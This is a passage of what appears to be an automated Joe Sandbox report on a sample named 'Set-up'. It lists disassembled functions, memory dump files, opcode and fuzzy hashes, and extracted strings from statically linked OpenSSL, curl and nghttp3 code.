                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _time64
                                • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                                • API String ID: 1670930206-2395985473
                                • Opcode ID: fe6ae2e29df14b9ff19eec8398ff99f970ff3651fc02c4fe4cd67d752f134272
                                • Instruction ID: 2774c060a9a768104cc7ce7a823725de01c6435deb34f7ef91e6b5d6695e8f5e
                                • Opcode Fuzzy Hash: fe6ae2e29df14b9ff19eec8398ff99f970ff3651fc02c4fe4cd67d752f134272
                                • Instruction Fuzzy Hash: C4212EB1B003005FEB286A2A9C05F2779DAEBD4304F18853DF909CB2D2F675D9108B61
                                Function 001B6010 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 001B6119
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 001B612E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                                • API String ID: 1222420520-3888743547
                                • Opcode ID: f2a0986be2e88b84bafb3bf257a3e9da41f335021b175134054e6cfee34d84c2
                                • Instruction ID: 92f8ea403f5da4eae51223c6ba77126233eef4059fb1b17d84b2809292052417
                                • Opcode Fuzzy Hash: f2a0986be2e88b84bafb3bf257a3e9da41f335021b175134054e6cfee34d84c2
                                • Instruction Fuzzy Hash: 2231F7715043058FC704EF19D885AAAB7E4FFA8318F05867CF98A57392E735AD41CB91
                                Function 001B87E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,001B4D5A,00000000,?,000001F0), ref: 001B8861
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 001B8873
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                                • API String ID: 1222420520-3025919285
                                • Opcode ID: eb74b44776314e085e509e9845d8e90ed4b09730b3424f169415ac1fa9eb0f22
                                • Instruction ID: a576ccc7f2274a9a7769a34666689070c407ddb3f472dbf0d4d679caa27d053c
                                • Opcode Fuzzy Hash: eb74b44776314e085e509e9845d8e90ed4b09730b3424f169415ac1fa9eb0f22
                                • Instruction Fuzzy Hash: 1111CEF6A04702BBC6009F28EC41996B3A8FF55B25F044624F914A22D2DB34E820CBE5
                                Function 00114810 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 484COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: application/octet-stream$formdata.c
                                • API String ID: 0-1216067158
                                • Opcode ID: 055bc8df7f1b7687725c21d0029d5519a24980ae9d8821731835812114cf74a4
                                • Instruction ID: f7ee019da668166f3c17e4a1c887bf4a04eaaa555e2f353bb0b70e8541fd6219
                                • Opcode Fuzzy Hash: 055bc8df7f1b7687725c21d0029d5519a24980ae9d8821731835812114cf74a4
                                • Instruction Fuzzy Hash: B102B770A08B409FEB2D9F14D9407A67BE27F95708F19483CE88A4B792D775E8C5CB81
                                Function 003B46B0 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 324stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 003B46DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                                • API String ID: 39653677-2338284442
                                • Opcode ID: e47bbab925e540b508df9f401285c61961df45dfcf0728fc845f74e60e561024
                                • Instruction ID: a711bd78cb1b1750f8bb1b34dbcda80f56f02a30a11203d2317a02f268957a8c
                                • Opcode Fuzzy Hash: e47bbab925e540b508df9f401285c61961df45dfcf0728fc845f74e60e561024
                                • Instruction Fuzzy Hash: 85A1FC75B483016BE7126E149C42FAB7394AB91708F05462CFB899B7C3E7B5DC108A5F
                                Function 00302530 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 306COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: .%lu$crypto/objects/obj_dat.c
                                • API String ID: 0-3322715555
                                • Opcode ID: 4a1cbdae02fa92b7e766078ef11dca92ffc92aae7ddca7dfe409fa172c7d6019
                                • Instruction ID: e91cf0f498f35d3bef5274d2531d4aec93a7ac2975334982eff381ecf63b3f5f
                                • Opcode Fuzzy Hash: 4a1cbdae02fa92b7e766078ef11dca92ffc92aae7ddca7dfe409fa172c7d6019
                                • Instruction Fuzzy Hash: 35A12771A0A3015BDB129E258C6872BB7E9AFD1704F19882DFC898B3C1EB71DC04C792
                                Function 0012E300 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 283COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                                • API String ID: 0-950935550
                                • Opcode ID: b65092d45b5848b33b569b250fc551f10799f90cc392e2750d71f05af0e9a249
                                • Instruction ID: 57679fba3ffc2bddb2ac7ddd30af2bf0bd1022616adafc0ab1316dc82763762d
                                • Opcode Fuzzy Hash: b65092d45b5848b33b569b250fc551f10799f90cc392e2750d71f05af0e9a249
                                • Instruction Fuzzy Hash: E0B1C8B5B00B12ABE7199B74EC45BA6F7A0BF55315F080339E82C96281E7357474CBD1
                                Function 0026A210 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 152stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0026A37F
                                Strings
                                • ssl/quic/quic_channel.c, xrefs: 0026A2E3, 0026A3BA
                                • ossl_quic_channel_raise_protocol_error_loc, xrefs: 0026A2D9, 0026A3B0
                                • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0026A3D5
                                • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0026A310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                                • API String ID: 39653677-1084217658
                                • Opcode ID: 7ac72be18f246bafcb3ed2298b80cf1d6747ac782401693753292469039f6fea
                                • Instruction ID: 7b51d17539189fd3cf901b283151b085a2e7831210da1e9d12cc0f2f2e8165a3
                                • Opcode Fuzzy Hash: 7ac72be18f246bafcb3ed2298b80cf1d6747ac782401693753292469039f6fea
                                • Instruction Fuzzy Hash: 885191B1A14345ABCF00DF68DC42E9B7BE9AF88354F044528FD48A7202E775D9608FA2
                                Function 00496250 Relevance: 7.7, APIs: 5, Instructions: 151COMMON
                                Download Yara Rule
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,001E0E3B,?,?,00000000,?), ref: 004963E9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,001E0E3B,?,?,00000000,?), ref: 004963FB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno
                                • String ID:
                                • API String ID: 2918714741-0
                                • Opcode ID: 14e91697afff0e5bb4c7250993eb4cde2c0e37f3ab3392e821df9ba815fe96fa
                                • Instruction ID: 4e7f960594a485eb950ce6da41005618d2fb08b0d011cdb5a33b98c4e913b7bb
                                • Opcode Fuzzy Hash: 14e91697afff0e5bb4c7250993eb4cde2c0e37f3ab3392e821df9ba815fe96fa
                                • Instruction Fuzzy Hash: 9841C271A043019BDF109F699880A2B7BE8AF94754F1A443EFC49C7301E678EC05869A
                                Function 002C67F0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 117stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002C691C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                                • API String ID: 39653677-804487489
                                • Opcode ID: 93fd4015da321054b106a8d62c82192ddfa39261fb91b2f8e040256e6f60a2ac
                                • Instruction ID: f441b9aa8676c89f5af054fc01c8784deda528411ece18adc3e7aefeabdd9049
                                • Opcode Fuzzy Hash: 93fd4015da321054b106a8d62c82192ddfa39261fb91b2f8e040256e6f60a2ac
                                • Instruction Fuzzy Hash: 47310BB2A243056BFB206E155C4AFA7769CAB91354F04053CFD4C52193F776AC38C6A2
                                Function 0045A340 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 106stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0045ABB9), ref: 0045A34E
                                  • Part of subcall function 002EE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 002EE28D
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0045ABB9), ref: 0045A446
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$_errno
                                • String ID: .cnf$.conf$crypto/conf/conf_def.c
                                • API String ID: 3066963124-3060939390
                                • Opcode ID: 6597f53d55e4e2f13c729d9244741f54085292782086979ceafd12fd71b0ce9e
                                • Instruction ID: 0e607a11eb8040426f6885672d23637d65821565f9465bda883ec82f6e017c44
                                • Opcode Fuzzy Hash: 6597f53d55e4e2f13c729d9244741f54085292782086979ceafd12fd71b0ce9e
                                • Instruction Fuzzy Hash: 9B2125E2D4424167DA107672AC43E1B368C8F5234AF48093EFC0596283F76DDE3886A7
                                Function 002A0870 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 105COMMON
                                Download Yara Rule
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,002EF556,00000000,FFFFFFFF,00000000,?,00000000,002F06DF,?), ref: 002A08D7
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0026973B), ref: 002A0977
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memsetstrcpystrlen
                                • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                                • API String ID: 1298912638-2735992530
                                • Opcode ID: 57982fdca97bd67896b99bc8e4f090a25bb0645e46d6f14021e37e268194156a
                                • Instruction ID: ec22de5a72e1de42fa221e97a2fe354e3ed71d4beac5681eaf53058301ecb1f9
                                • Opcode Fuzzy Hash: 57982fdca97bd67896b99bc8e4f090a25bb0645e46d6f14021e37e268194156a
                                • Instruction Fuzzy Hash: AC3131B1A602077BE7109E259C82F1BB79CAF41B24F144629F81C973C3E769AC3487D5
                                Function 004966C0 Relevance: 7.6, APIs: 5, Instructions: 100stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00497850: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,004966E9,?,?,?,?,?,?,?,?,?,?,?), ref: 0049787B
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,UTF-8,00000001,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 004966F5
